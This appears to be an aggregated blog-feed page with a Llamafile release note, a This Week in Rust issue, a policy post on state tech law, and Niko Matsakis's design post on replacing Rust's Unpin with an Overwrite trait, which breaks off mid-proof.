  • Llama 3.2 1B and 3B: offering extremely impressive performance and quality for their small size. (Here’s a video from our own Mike Heavers showing it in action.)
  • Llama 3.1 405B: a true “frontier model” that’s possible to run at home with sufficient system RAM.
  • OLMo 7B: from our friends at the Allen Institute, OLMo is one of the first truly open and transparent models available.
  • TriLM: a new “1.58 bit” tiny model that is optimized for CPU inference and points to a near future where matrix multiplication might no longer rule the day.

Whisperfile, speech-to-text in a single file: Thanks to contributions from community member @cjpais, we’ve created Whisperfile, which does for whisper.cpp what Llamafile did for llama.cpp: that is, turns it into a multi-platform executable that runs nearly everywhere. Whisperfile thus makes it easy to use OpenAI’s Whisper technology to efficiently convert speech into text, no matter which kind of hardware you have.

Get involved

Our goal is for Llamafile to become a rock-solid foundation for building sophisticated locally-running AI applications. Justine’s work on the new Llamafiler server is a big part of that equation, but so is the ongoing work of supporting new models and optimizing inference performance for as many users as possible. We’re proud and grateful that some of the project’s biggest breakthroughs in these areas, and others, have come from the community, with contributors like @Kawrakow, @cjpais, @mofosyne, and @Djip007 routinely leaving their mark.

We invite you to join them, and us. We welcome issues and PRs in our GitHub repo. And we welcome you to become a member of Mozilla’s AI Discord server, which has a dedicated channel just for Llamafile where you can get direct access to the project team. Hope to see you there!

 

The post Llamafile v0.8.14: a new UI, performance gains, and more appeared first on Mozilla Hacks - the Web developer blog.

This Week In RustThis Week in Rust 569

Hello and welcome to another issue of This Week in Rust! Rust is a programming language empowering everyone to build reliable and efficient software. This is a weekly summary of its progress and community. Want something mentioned? Tag us at @ThisWeekInRust on X (formerly Twitter) or @ThisWeekinRust on mastodon.social, or send us a pull request. Want to get involved? We love contributions.

This Week in Rust is openly developed on GitHub and archives can be viewed at this-week-in-rust.org. If you find any errors in this week's issue, please submit a PR.

Want TWIR in your inbox? Subscribe here.

Updates from Rust Community

Foundation
Newsletters
Project/Tooling Updates
Observations/Thoughts
Rust Walkthroughs

Crate of the Week

This week's crate is bacon, a terminal application to run your cargo tasks on change in background.

Thanks to Denys Séguret for the self-suggestion! Please submit your suggestions and votes for next week!

Calls for Testing

An important step for RFC implementation is for people to experiment with the implementation and give feedback, especially before stabilization. The following RFCs would benefit from user testing before moving forward:

RFCs
  • No calls for testing were issued this week.
Rust
  • No calls for testing were issued this week.
Rustup
  • No calls for testing were issued this week.

If you are a feature implementer and would like your RFC to appear on the above list, add the new call-for-testing label to your RFC along with a comment providing testing instructions and/or guidance on which aspect(s) of the feature need testing.

Call for Participation; projects and speakers

CFP - Projects

Always wanted to contribute to open-source projects but did not know where to start? Every week we highlight some tasks from the Rust community for you to pick and get started!

Some of these tasks may also have mentors available, visit the task page for more information.

No Calls for participation were submitted this week.

If you are a Rust project owner and are looking for contributors, please submit tasks here or through a PR to TWiR or by reaching out on X (formerly Twitter) or Mastodon!

CFP - Events

Are you a new or experienced speaker looking for a place to share something cool? This section highlights events that are being planned and are accepting submissions to join their event as a speaker.

No Calls for papers or presentations were submitted this week.

If you are an event organizer hoping to expand the reach of your event, please submit a link to the website through a PR to TWiR or by reaching out on X (formerly Twitter) or Mastodon!

Updates from the Rust Project

468 pull requests were merged in the last week

Rust Compiler Performance Triage

No major changes this week.

Triage done by @simulacrum. Revision range: e6c46db4..5ceb623a

Full report here

Approved RFCs

Changes to Rust follow the Rust RFC (request for comments) process. These are the RFCs that were approved for implementation this week:

  • No RFCs were approved this week.
Final Comment Period

Every week, the team announces the 'final comment period' for RFCs and key PRs which are reaching a decision. Express your opinions now.

RFCs
  • No RFCs entered Final Comment Period this week.
Tracking Issues & PRs
Rust Cargo Language Team
  • No Cargo Tracking Issues or PRs entered Final Comment Period this week.
Language Reference
  • No Language Reference RFCs entered Final Comment Period this week.
Unsafe Code Guidelines
  • No Unsafe Code Guideline Tracking Issues or PRs entered Final Comment Period this week.
New and Updated RFCs

Upcoming Events

Rusty Events between 2024-10-16 - 2024-11-13 🦀

Virtual
Africa
Asia
Europe
North America
Oceania

If you are running a Rust event please add it to the calendar to get it mentioned here. Please remember to add a link to the event too. Email the Rust Community Team for access.

Jobs

Please see the latest Who's Hiring thread on r/rust

Quote of the Week

We'd have buttons on the screen to control the fans of the car. I had to write a lot of code before I could compile it all, a big jenga tower. But once it compiled, the fans started to work! Very impressed.

Julius Gustavsson on the Tweedegolf blog

Thanks to scottmcm for the suggestion!

Please submit quotes and vote for next week!

This Week in Rust is edited by: nellshamrell, llogiq, cdmistman, ericseppanen, extrawurst, andrewpollack, U007D, kolharsam, joelmarcey, mariannegoldin, bennyvasquez.

Email list hosting is sponsored by The Rust Foundation

Discuss on r/rust

Don MartiAnother easy-ish state law: the No Second-class Citizenship Act

Tired of Big Tech companies giving consumer protections, fraud protections, and privacy protections to their users in other countries but not to people at home in the USA? Here’s another state law we could use, and I bet it could be a two-page PDF.

If a company has more than 10% of our state’s residents as customers or users, and also does business in 50 or more countries, then if they offer a privacy or consumer protection feature in a non-US location they must also offer it in our state within 90 days.

Have it enforced Texas SB 8 style, by individuals, so harder for Big Tech sockpuppet orgs to challenge.

Reference

Antitrust challenge to Facebook’s ‘superprofiling’ finally wraps in Germany — with Meta agreeing to data limits | TechCrunch We’ve asked Meta to confirm whether changes will be implemented globally — or only inside the German market where the Bundeskartellamt has jurisdiction.

Related

there ought to be a law (Big Tech lobbyists are expensive—instead of grinding out the PDFs they expect, make them fight an unpredictable distributed campaign of random-ish ideas, coded into bills that take the side of local small businesses?)

Bonus links

How the long-gone Habsburg Empire is still visible in Eastern European bureaucracies today The formal institutions of the empire ceased to exist with the collapse of the Habsburg Empire after World War I, breaking up into separate nation states that have seen several waves of drastic institutional changes since. We might therefore wonder whether differences in trust and corruption across areas that belonged to different empires in the past really still survive to this day.

TikTok knows its app is harming kids, new internal documents show : NPR (this kind of stuff is why I’ll never love your brand—if a brand is fine with advertising on surveillance apps with all we know about how they work, then I’m enough opposed to them on fundamental issues that all transactions will be based on lack of trust.)

Cloudflare Destroys Another Patent Troll, Gets Its Patents Released To The Public (time for some game theory)

Conceptual models of space colonization (One that’s missing: Kurt Vonnegut’s concept involving large-scale outward transfer of genetic material. Probably most likely to happen if you add in Von Neumann machines and the systems required to grow live colonists from genetic data—which don’t exist but are not physically or economically impossible…)

Cash incinerator OpenAI secures its $6.6 billion lifeline — ‘in the spirit of a donation’ (fwiw, there are still a bunch of copyright cases out there, too. (AI legal links) Related: The Subprime AI Crisis)

The cheap chocolate system The giant chocolate companies want cocoa beans to be a commodity. They don’t want to worry about origin or yield–they simply want to buy indistinguishable cheap cacao. In fact, the buyers at these companies feel like they have no choice but to push for mediocre beans at cut rate prices, regardless of the human cost. (so it’s like adtech you eat?)

How web bloat impacts users with slow devices CPU performance for web apps hasn’t scaled nearly as quickly as bandwidth so, while more of the web is becoming accessible to people with low-end connections, more of the web is becoming inaccessible to people with low-end devices even if they have high-end connections.

Niko MatsakisThe `Overwrite` trait and `Pin`

In July, boats presented a compelling vision in their post pinned places. With the Overwrite trait that I introduced in my previous post, however, I think we can get somewhere even more compelling, albeit at the cost of a tricky transition. As I will argue in this post, the Overwrite trait effectively becomes a better version of the existing Unpin trait, one that effects not only pinned references but also regular &mut references. Through this it’s able to make Pin fit much more seamlessly with the rest of Rust.

Just show me the dang code

Before I dive into the details, let’s start by reviewing a few examples to show you what we are aiming at (you can also skip to the TL;DR, in the FAQ).

I’m assuming a few changes here:

  • Adding an Overwrite trait and changing most types to be !Overwrite by default.
    • The Option<T> (and maybe others) would opt-in to Overwrite, permitting x.take().
  • Integrating pin into the borrow checker, extending auto-ref to also “auto-pin” and produce a Pin<&mut T>. The borrow checker only permits you to pin values that you own. Once a place has been pinned, you are not permitted to move out from it anymore (unless the value is overwritten).

The first change is “mildly” backwards incompatible. I’m not going to worry about that in this post, but I’ll cover the ways I think we can make the transition in a follow up post.

Example 1: Converting a generator into an iterator

We would really like to add a generator syntax that lets you write an iterator more conveniently.1 For example, given some slice strings: &[String], we should be able to define a generator that iterates over the string lengths like so:

fn do_computation() -> usize {
    let hashes = gen {
        let strings: Vec<String> = compute_input_strings();
        for string in &strings {
            yield compute_hash(&string);
        }
    };
    
    // ...
}

But there is a catch here! To permit the borrow of strings, which is owned by the generator, the generator will have to be pinned.2 That means that generators cannot directly implement Iterator, because generators need a Pin<&mut Self> signature for their next methods. It is possible, however, to implement Iterator for Pin<&mut G> where G is a generator.3

In today’s Rust, that means that using a generator as an iterator would require explicit pinning:

fn do_computation() -> usize {
    let hashes = gen {....};
    let hashes = pin!(hashes); // <-- explicit pin
    if let Some(h) = hashes.next() {
        // process first hash
    };
    // ...
}

With pinned places, this feels more builtin, but it still requires users to actively think about pinning for even the most basic use case:

fn do_computation() -> usize {
    let hashes = gen {....};
    let pinned mut hashes = hashes;
    if let Some(h) = hashes.next() {
        // process first hash
    };
    // ...
}

Under this proposal, users would simply be able to ignore pinning altogether:

fn do_computation() -> usize {
    let mut hashes = gen {....};
    if let Some(h) = hashes.next() {
        // process first hash
    };
    // ...
}

Pinning is still happening: once a user has called next, they would not be able to move hashes after that point. If they tried to do so, the borrow checker (which now understands pinning natively) would give an error like:

error[E0596]: cannot borrow `hashes` as mutable, as it is not declared as mutable
 --> src/lib.rs:4:22
  |
4 |     if let Some(h) = hashes.next() {
  |                      ------ value in `hashes` was pinned here
  |     ...
7 |     move_somewhere_else(hashes);
  |                         ^^^^^^ cannot move a pinned value
help: if you want to move `hashes`, consider using `Box::pin` to allocate a pinned box
  |
3 |     let mut hashes = Box::pin(gen { .... });
  |                      +++++++++            +

As noted, it is possible to move hashes after pinning, but only if you pin it into a heap-allocated box. So we can advise users how to do that.

Example 2: Implementing the MaybeDone future

The pinned places post included an example future called MaybeDone. I’m going to implement that same future in the system I describe here. There are some comments in the example comparing it to the version from the pinned places post.

enum MaybeDone<F: Future> {
    //         ---------
    //         I'm assuming we are in Rust.Next, and so the default
    //         bounds for `F` do not include `Overwrite`.
    //         In other words, `F: ?Overwrite` is the default
    //         (just as it is with every other trait besides `Sized`).
    
    Polling(F),
    //      -
    //      We don't need to declare `pinned F`.
    
    Done(Option<F::Output>),
}

impl<F: Future> MaybeDone<F> {
    fn maybe_poll(self: Pin<&mut Self>, cx: &mut Context<'_>) {
        //        --------------------
        //        I'm not bothering with the `&pinned mut self`
        //        sugar here, though certainly we could still
        //        add it.
        if let MaybeDone::Polling(fut) = self {
            //                    ---
            //       Just as in the original example,
            //       we are able to project from `Pin<&mut Self>`
            //       to a `Pin<&mut F>`.
            //
            //       The key is that we can safely project
            //       from an owner of type `Pin<&mut Self>`
            //       to its field of type `Pin<&mut F>`
            //       so long as the owner type `Self: !Overwrite`
            //       (which is the default for structs in Rust.Next).
            if let Poll::Ready(res) = fut.poll(cx) {
                *self = MaybeDone::Done(Some(res));
            }
        }
    }

    fn is_done(&self) -> bool {
        matches!(self, &MaybeDone::Done(_))
    }

    fn take_output(&mut self) -> Option<F::Output> {
        //         ---------
        //   In pinned places, this method had to be
        //   `&pinned mut self`, but under this design,
        //   it can be a regular `&mut self`.
        //   
        //   That's because `Pin<&mut Self>` becomes
        //   a subtype of `&mut Self`.
        if let MaybeDone::Done(res) = self {
            res.take()
        } else {
            None
        }
    }
}
Example 3: Implementing the Join combinator

Let’s complete the journey by implementing a Join future:

struct Join<F1: Future, F2: Future> {
    // These fields do not have to be declared `pinned`:
    fut1: MaybeDone<F1>,
    fut2: MaybeDone<F2>,
}

impl<F1, F2> Future for Join<F1, F2>
where
    F1: Future,
    F2: Future,
{
    type Output = (F1::Output, F2::Output);

    fn poll(self: Pin<&mut Self>, cx: &mut Context<'_>) -> Poll<Self::Output> {
        //  --------------------
        // Again, I've dropped the sugar here.
        
        // This looks just the same as in the
        // "Pinned Places" example. This again
        // leans on the ability to project
        // from a `Pin<&mut Self>` owner so long as
        // `Self: !Overwrite` (the default for structs
        // in Rust.Next).
        self.fut1.maybe_poll(cx);
        self.fut2.maybe_poll(cx);
        
        if self.fut1.is_done() && self.fut2.is_done() {
            // This code looks the same as it did with pinned places,
            // but there is an important difference. `take_output`
            // is now an `&mut self` method, not a `Pin<&mut Self>`
            // method. This demonstrates that we can also get
            // a regular `&mut` reference to our fields.
            let res1 = self.fut1.take_output().unwrap();
            let res2 = self.fut2.take_output().unwrap();
            Poll::Ready((res1, res2))
        } else {
            Poll::Pending
        }
    }
}

How I think about pin

OK, now that I’ve lured you in with code examples, let me drive you away by diving into the details of Pin. I’m going to cover the way that I think about Pin. It is similar to but different from how Pin is presented in the pinned places post – in particular, I prefer to think about places that pin their values and not pinned places. In any case, Pin is surprisingly subtle, and I recommend that if you want to go deeper, you read boat’s history of Pin post and/or the stdlib documentation for Pin.

The Pin<P> type is a modifier on the pointer P

The Pin<P> type is unusual in Rust. It looks similar to a “smart pointer” type, like Arc<T>, but it functions differently. Pin<P> is not a pointer, it is a modifier on another pointer, so

  • a Pin<&T> represents a pinned reference,
  • a Pin<&mut T> represents a pinned mutable reference,
  • a Pin<Box<T>> represents a pinned box,

and so forth.

You can think of a Pin<P> type as being a pointer of type P that refers to a place (Rust jargon for a location in memory that stores a value) whose value v has been pinned. A pinned value v can never be moved to another place in memory. Moreover, v must be dropped before its place can be reassigned to another value.

Pinning is part of the “lifecycle” of a place

The way I think about, every place in memory has a lifecycle:

flowchart TD
Uninitialized 
Initialized
Pinned

Uninitialized --
    p = v where v: T
--> Initialized

Initialized -- 
    move out, drop, or forget
--> Uninitialized

Initialized --
    pin value v in p
    (only possible when T is !Unpin)
--> Pinned

Pinned --
    drop value
--> Uninitialized

Pinned --
    move out or forget
--> UB

Uninitialized --
    free the place
--> Freed

UB[💥 Undefined behavior 💥]
  

When first allocated, a place p is uninitialized – that is, p has no value at all.

An uninitialized place can be freed. This corresponds to e.g. popping a stack frame or invoking free.

p may at some point become initialized by an assignment like p = v. At that point, there are three ways to transition back to uninitialized:

  • The value v could be moved somewhere else, e.g. by moving it somewhere else, like let p2 = p. At that point, p goes back to being uninitialized.
  • The value v can be forgotten, with std::mem::forget(p). At this point, no destructor runs, but p goes back to being considered uninitialized.
  • The value v can be dropped, which occurs when the place p goes out of scope. At this point, the destructor runs, and p goes back to being considered uninitialized.

Alternatively, the value v can be pinned in place:

  • At this point, v cannot be moved again, and the only way for p to be reused is for v to be dropped.

Once a value is pinned, moving or forgetting the value is not allowed. These actions are “undefined behavior”, and safe Rust must not permit them to occur.

A digression on forgetting vs other ways to leak

As most folks know, Rust does not guarantee that destructors run. If you have a value v whose destructor never runs, we say that value is leaked. There are however two ways to leak a value, and they are quite different in their impact:

  • Option A: Forgetting. Using std::mem::forget, you can forget the value v. The place p that was storing that value will go from initialized to uninitialized, at which point the place p can be freed.
    • Forgetting a value is undefined behavior if that value has been pinned, however!
  • Option B: Leak the place. When you leak a place, it just stays in the initialized or pinned state forever, so its value is never dropped. This can happen, for example, with a ref-count cycle.
    • This is safe even if the value is pinned!

In retrospect, I wish that Option A did not exist – I wish that we had not added std::mem::forget. We did so as part of working through the impact of ref-count cycles. It seemed equivalent at the time (“the dtor doesn’t run anyway, why not make it easy to do”) but I think this diagram shows why it adding forget made things permanently more complicated for relatively little gain.4 Oh well! Can’t win ’em all.

Values of types implementing Unpin cannot be pinned

There is one subtle aspect here: not all values can be pinned. If a type T implements Unpin, then values of type T cannot be pinned. When you have a pinned reference to them, they can still squirm out from under you via swap or other techniques. Another way to say the same thing is to say that values can only be pinned if their type is !Unpin (“does not implement Unpin”).

Types that are !Unpin can be called address sensitive, meaning that once they pinned, there can be pointers to the internals of that value that will be invalidated if the address changes. Types that implement Unpin would therefore be address insensitive. Traditionally, all Rust types have been address insensitive, and therefore Unpin is an auto trait, implemented by most types by default.

Pin<&mut T> is really a “maybe pinned” reference

Looking at the state machine as I describe it here, we can see that possessing a Pin<&mut T> isn’t really a pinned mutable reference, in the sense that it doesn’t always refer to a place that is pinning its value. If T: Unpin, then it’s just a regular reference. But if T: !Unpin, then a pinned reference guarantees that the value it refers to is pinned in place.

This fits with the name Unpin, which I believe was meant to convey that idea that, even if you have a pinned reference to a value of type T: Unpin, that value can become unpinned. I’ve heard the metaphor of “if T: Unpin, you can left out the pin, swap in a different value, and put the pin back”.

Pin picked a peck of pickled pain

Everyone agrees that Pin is confusing and a pain to use. But what makes it such a pain?

If you are attempting to author a Pin-based API, there are two primary problems:

  1. Pin<&mut Self> methods can’t make use of regular &mut self methods.
  2. Pin<&mut Self> methods can’t access fields by default. Crates like pin-project-lite make this easier but still require learning obscure concepts like structural pinning.

If you attempting to consume a Pin-based API, the primary annoyance is that getting a pinned reference is hard. You can’t just call Pin<&mut Self> methods normally, you have to remember to use Box::pin or pin! first. (We saw this in Example 1 from this post.)

My proposal in a nutshell

This post is focused on a proposal with two parts:

  1. Making Pin-based APIs easier to author by replacing the Unpin trait with Overwrite.
  2. Making Pin-based APIs easier to call by integrating pinning into the borrow checker.

I’m going to walk through those in turn.

Making Pin-based APIs easier to author

Overwrite as the better Unpin

The first part of my proposalis a change I call s/Unpin/Overwrite/. The idea is to introduce Overwrite and then change the “place lifecycle” to reference Overwrite instead of Unpin:

flowchart TD
Uninitialized 
Initialized
Pinned

Uninitialized --
    p = v where v: T
--> Initialized

Initialized -- 
    move out, drop, or forget
--> Uninitialized

Initialized --
    pin value v in p
    (only possible when
T is 👉!Overwrite👈) --> Pinned Pinned -- drop value --> Uninitialized Pinned -- move out or forget --> UB Uninitialized -- free the place --> Freed UB[💥 Undefined behavior 💥]

For s/Unpin/Overwrite/ to work well, we have to make all !Unpin types also be !Overwrite. This is not, strictly speaking, backwards compatible, since today !Unpin types (like all types) can be overwritten and swapped. I think eventually we want every type to be !Overwrite by default, but I don’t think we can change that default in a general way without an edition. But for !Unpin types in particular I suspect we can get away with it, because !Unpin types are pretty rare, and the simplification we get from doing so is pretty large. (And, as I argued in the previous post, there is no loss of expressiveness; code today that overwrites or swaps !Unpin values can be locally rewritten.)

Why swaps are bad without s/Unpin/Overwrite/

Today, Pin<&mut T> cannot be converted into an &mut T reference unless T: Unpin.5 This because it would allow safe Rust code to create Undefined Behavior by swapping the referent of the &mut T reference and hence moving the pinned value. By requiring that T: Unpin, the DerefMut impl is effectively limiting itself to references that are not, in fact, in the “pinned” state, but just in the “initialized” state.

As a result, Pin<&mut T> and &mut T methods don’t interoperate today

This leads directly to our first two pain points. To start, from a Pin<&mut Self> method, you can only invoke &self methods (via the Deref impl) or other Pin<&mut Self> methods. This schism separates out the “regular” methods of a type from its pinned methods; it also means that methods doing field assignments don’t compile:

fn increment_field(self: Pin<&mut Self>) {
    self.field = self.field + 1;
}

This errors because compiling a field assignment requires a DerefMut impl and Pin<&mut Self> doesn’t have one.

With s/Unpin/Overwrite/, Pin<&mut Self> is a subtype of &mut self

s/Unpin/Overwrite/ allows us to implement DerefMut for all pinned types. This is because, unlike Unpin, Overwrite affects how &mut works, and hence &mut T would preserve the pinned state for the place it references. Consider the two possibilities for the value of type T referred to by the &mut T:

  • If T: Overwrite, then the value is not pinnable, and so the place cannot be in the pinned state.
  • If T: !Overwrite, the value could be pinned, but we also cannot overwrite or swap it, and so pinning is preserved.

This implies that Pin<&mut T> is in fact a generalized version of &mut T. Every &'a mut T keeps the value pinned for the duration of its lifetime 'a, but a Pin<&mut T> ensures the value stays pinned for the lifetime of the underlying storage.

If we have a DerefMut impl, then Pin<&mut Self> methods can freely call &mut self methods. Big win!

Today you must categorize fields as “structurally pinned” or not

The other pain point today with Pin is that we have no native support for “pin projection”6. That is, you cannot safely go from a Pin<&mut Self> reference to a Pin<&mut F> method that referring to some field self.f without relying on unsafe code.

The most common practice today is to use a custom crate like pin-project-lite. Even then, you also have to make a choice for each field between whether you want to be able to get a Pin<&mut F> reference or a normal &mut F reference. Fields for which you can get a pinned reference are called structurally pinned and the criteria for which one you should use is rather subtle. Ultimately this choice is required because Pin<&mut F> and &mut F don’t play nicely together.

Pin projection is safe from any !Overwrite type

With s/Unpin/Overwrite/, we can scrap the idea of structural pinning. Instead, if we have a field owner self: Pin<&mut Self>, pinned projection is allowed so long as Self: !Overwrite. That is, if Self: !Overwrite, then I can always get a Pin<&mut F> reference to some field self.f of type F. How is that possible?

Actually, the full explanation relies on borrow checker extensions I haven’t introduced yet. But let’s see how far we get without them, so that we can see the gap that the borrow checker has to close.

Assume we are creating a Pin<&'a mut F> reference r to some field self.f, where self: Pin<&mut Self>:

  • We are creating a Pin<&'a mut F> reference to the value in self.f:
    • If F: Overwrite, then the value is not pinnable, so this is equivalent to an ordinary &mut F and we have nothing to prove.
    • Else, if F: !Overwrite, then we have to show that the value in self.f will not move for the remainder of its lifetime.
      • Pin projection from ``*selfis only valid ifSelf: !Overwriteandself: Pin<&‘b mut Self>, so we know that the value in *self` is pinned for the remainder of its lifetime by induction.
      • We have to show then that the value v_f in self.f will never be moved until the end of its lifetime.

There are three ways to move a value out of self.f:

  • You can assign a new value to self.f, like self.f = ....
    • This will run the destructor, ending the lifetime of the value v_f.
  • You can create a mutable reference r = &mut self.f and then…
    • assign a new value to *r: but that will be an error because F: !Overwrite.
    • swap the value in *r with another: but that will be an error because F: !Overwrite.

QED. =)

Making Pin-based APIs easier to call

Today, getting a Pin<&mut> requires using the pin! macro, going through Box::pin, or some similar explicit action. This adds “syntactic salt” to calling a Pin<&mut Self> some other abstraction rooted in unsafe (e.g., Box::pin). There is no built-in way to safely create a pinned reference. This is fine but introduces ergonomic hurdles

We want to make calling a Pin<&mut Self> method as easy as calling an &mut self method. To do this, we need to extra the compiler’s notion of “auto-ref” to include the option of “auto-pin-ref”:

// Instead of this:
let future: Pin<&mut impl Future> = pin!(async { ... });
future.poll(cx);

// We would do this:
let mut future: impl Future = async { ... };
future.poll(cx); // <-- Wowee!

Just as a typical method call like vec.len() expands to Vec::len(&vec), the compiler would be expanding future.poll(cx) to something like so:

Future::poll(&pinned mut future, cx)
//           ^^^^^^^^^^^ but what, what's this?

This expansion though includes a new piece of syntax that doesn’t exist today, the &pinned mut operation. (I’m lifting this syntax from boats’ pinned places proposal.)

Whereas &mut var results in an &mut T reference (assuming var: T), &pinned mut var borrow would result in a Pin<&mut T>. It would also make the borrow checker consider the value in future to be pinned. That means that it is illegal to move out from var. The pinned state continues indefinitely until var goes out of scope or is overwritten by an assignment like var = ... (which drops the heretofore pinned value). This is a fairly straightforward extension to the borrow checker’s existing logic.

New syntax not strictly required

It’s worth noting that we don’t actually need the &pinned mut syntax (which means we don’t need the pinned keyword). We could make it so that the only way to get the compiler to do a pinned borrow is via auto-ref. We could even add a silly trait to make it explicit, like so:

trait Pinned {
    fn pinned(self: Pin<&mut Self>) -> Pin<&mut Self>;
}

impl<T: ?Sized> Pinned for T {
    fn pinned(self: Pin<&mut T>) -> Pin<&mut T> {
        self
    }
}

Now you can write var.pinned(), which the compiler would desugar to Pinned::pinned(&rustc#pinned mut var). Here I am using rustc#pinned to denote an “internal keyword” that users can’t type.7

Frequently asked questions

So…there’s a lot here. What’s the key takeaways?

The shortest version of this post I can manage is8

  • Pinning fits smoothly into Rust if we make two changes:
    • Limit the ability to swap types by default, making Pin<&mut T> a subtype of &mut T and enabling uniform pin projection.
    • Integrate pinning in the auto-ref rules and the borrow checker.
Why do you only mention swaps? Doesn’t Overwrite affect other things?

Indeed the Overwrite trait as I defined it is overkill for pinning. The more precise, we might imagine two special traits that affect how and when we can drop or move values:

trait DropWhileBorrowed: Sized { }
trait Swap: DropWhileBorrowed { }
  • Given a reference r: &mut T, overwriting its referent *r with a new value would require T: DropWhileBorrowed;
  • Swapping two values of type T requires that T: Swap.
    • This is true regardless of whether they are borrowed or not.

Today, every type is Swap. What I argued in the previous post is that we should make the default be that user-defined types implement neither of these two traits (over an edition, etc etc). Instead, you could opt-in to both of them at once by implementing Overwrite.

But we could get all the pin benefits by making a weaker change. Instead of having types opt out from both traits by default, they could only opt out of Swap, but continue to implement DropWhileBorrowed. This is enough to make pinning work smoothly. To see why, recall the pinning state diagram: dropping the value in *r (permitted by DropWhileBorrowed) will exit the “pinned” state and return to the “uninitialized” state. This is valid. Swapping, in contrast, is UB.

Two subtle observations here worth calling out:

  1. Both DropWhileBorrowed and Swap have Sized as a supertrait. Today in Rust you can’t drop a &mut dyn SomeTrait value and replace it with another, for example. I think it’s a bit unclear whether unsafe could do this if it knows the dynamic type of value behind the dyn. But under this model, it would only be valid for unsafe code do that drop if (a) it knew the dynamic type and (b) the dynamic type implemented DropWhileBorrowed. Same applies to Swap.
  2. The Swap trait applies longer than just the duration of a borrow. This is because, once you pin a value to create a Pin<&mut T> reference, the state of being pinned persists even after that reference has ended. I say a bit more about this in another FAQ below.

EDIT: An earlier draft of this post named the trait Swap. This was wrong, as described in the FAQ on subtle reasoning.

Why then did you propose opting out from both overwrites and swaps?

Opting out of overwrites (i.e., making the default be neither DropWhileBorrowed nor Swap) gives us the additional benefit of truly immutable fields. This will make cross-function borrows less of an issue, as I described in my previous post, and make some other things (e.g., variance) less relevant. Moreover, I don’t think overwriting an entire reference like *r is that common, versus accessing individual fields. And in the cases where people do do it, it is easy to make a dummy struct with a single field, and then overwrite r.value instead of *r. To me, therefore, distinguishing between DropWhileBorrowed and Swap doesn’t obviously carry its weight.

Can you come up with a more semantic name for Overwrite?

All the trait names I’ve given so far (Overwrite, DropWhileBorrowed, Swap) answer the question of “what operation does this trait allow”. That’s pretty common for traits (e.g., Clone or, for that matter, Unpin) but it is sometimes useful to think instead about “what kinds of types should implement this trait” (or not implement it, as the case may be).

My current favorite “semantic style name” is Mobile, which corresponds to implementing Swap. A mobile type is one that, while borrowed, can move to a new place. This name doesn’t convey that it’s also ok to drop the value, but that follows, since if you can swap the value to a new place, you can presumably drop that new place.

I don’t have a “semantic” name for DropWhileBorrowed. As I said, I’m hard pressed to characterize the type that would want to implement DropWhileBorrowed but not Swap.

What do DropWhileBorrowed and Swap have in common?

These traits pertain to whether an owner who lends out a local variable (i.e., executes r = &mut lv) can rely on that local variable lv to store the same value after the borrow completes. Under this model, the answer depends on the type T of the local variable:

  • If T: DropWhileBorrowed (or T: Swap, which implies DropWhileBorrowed), the answer is “no”, the local variable may point at some other value, because it is possible to do *r = /* new value */.
  • But if T: !DropWhileBorrowed, then the owner can be sure that lv still stores the same value (though lv’s fields may have changed).

Let’s use an analogy. Suppose I own a house and I lease it out to someone else to use. I expect that they will make changes on the inside, such as hanging up a new picture. But I don’t expect them to tear down the house and build a new one on the same lot. I also don’t expect them to drive up a flatbed truck, load my house onto it, and move it somewhere else (while proving me with a new one in return). In Rust today, a reference r: &mut T reference allows all of these things:

  • Mutating a field like r.count += 1 corresponds to hanging up a picture. The values inside r change, but r still refers to the same conceptual value.
  • Overwriting *r = t with a new value t is like tearing down the house and building a new one. The original value that was in r no longer exists.
  • Swapping *r with some other reference *r2 is like moving my house somewhere else and putting a new house in its place.

EDIT: Wording refined based on feedback.

What does it mean to be the “same value”?

One question I received was what it meant for two structs to have the “same value”? Imagine a struct with all public fields – can we make any sense of it having an identity? The way I think of it, every struct has a “ghost” private field $identity (one that doesn’t exist at runtime) that contains its identity. Every StructName { } expression has an implicit $identity: new_value() that assigns the identity a distinct value from every other struct that has been created thus far. If two struct values have the same $identity, then they are the same value.

Admittedly, if a struct has all public fields, then it doesn’t really matter whether it’s identity is the same, except perhaps to philosophers. But most structs don’t.

An example that can help clarify this is what I call the “scope pattern”. Imagine I have a Scope type that has some private fields and which can be “installed” in some way and later “deinstalled” (perhaps it modifies thread-local values):

pub struct Scope {...}

impl Scope {
    fn new() -> Self { /* install scope */ }
}

impl Drop for Scope {
    fn drop(&mut self) {
        /* deinstall scope */
    }
}

And the only way for users to get their hands on a “scope” is to use with_scope, which ensures it is installed and deinstalled properly:

pub fn with_scope(op: impl FnOnce(&mut Scope)) {
    let mut scope = Scope::new();
    op(&mut scope);
}

It may appear that this code enforces a “stack discipline”, where nested scopes will be installed and deinstalled in a stack-like fashion. But in fact, thanks to std::mem::swap, this is not guaranteed:

with_scope(|s1| {
    with_scope(|s2| {
        std::mem::swap(s1, s2);
    })
})

This could easily cause logic bugs or, in unsafe is involved, something worse. This is why lending out scopes requires some extra step to be safe, such as using a &-reference or adding a “fresh” lifetime paramteer of some kind to ensure that each scope has a unique type. In principle you could also use a type like &mut dyn ScopeTrait, because the compiler disallows overwriting or swapping dyn Trait values: but I think it’s ambiguous today whether unsafe code could validly do such a swap.

EDIT: Question added based on feedback.

There’s a lot of subtle reasoning in this post. Are you sure this is correct?

I am pretty sure! But not 100%. I’m definitely scared that people will point out some obvious flaw in my reasoning. But of course, if there’s a flaw I want to know. To help people analyze, let me recap the two subtle arguments that I made in this post and recap the reasoning.

Lemma. Given some local variable lv: T where T: !Overwrite mutably borrowed by a reference r: &'a mut T, the value in lv cannot be dropped, moved, or forgotten for the lifetime 'a.

During 'a, the variable lv cannot be accessed directly (per the borrow checker’s usual rules). Therefore, any drops/moves/forgets must take place to *r:

  • Because T: !Overwrite, it is not possible to overwrite or swap *r with a new value; it is only legal to mutate individual fields. Therefore the value cannot be dropped or moved.
  • Forgetting a value (via std::mem::forget) requires ownership and is not accesible while lv is borrowed.

Theorem A. If we replace T: Unpin and T: Overwrite, then Pin<&mut T> is a safe subtype of &mut T.

The argument proceeds by cases:

  • If T: Overwrite, then Pin<&mut T> does not refer to a pinned value, and hence it is semantically equivalent to &mut T.
  • If T: !Overwrite, then Pin<&mut T> does refer to a pinned value, so we must show that the pinning guarantee cannot be disturbed by the &mut T. By our lemma, the &mut T cannot move or forget the pinned value, which is the only way to disturb the pinning guarantee.

Theorem B. Given some field owner o: O where O: !Overwrite with a field f: F, it is safe to pin-project from Pin<&mut O> to a Pin<&mut F> reference referring to o.f.

The argument proceeds by cases:

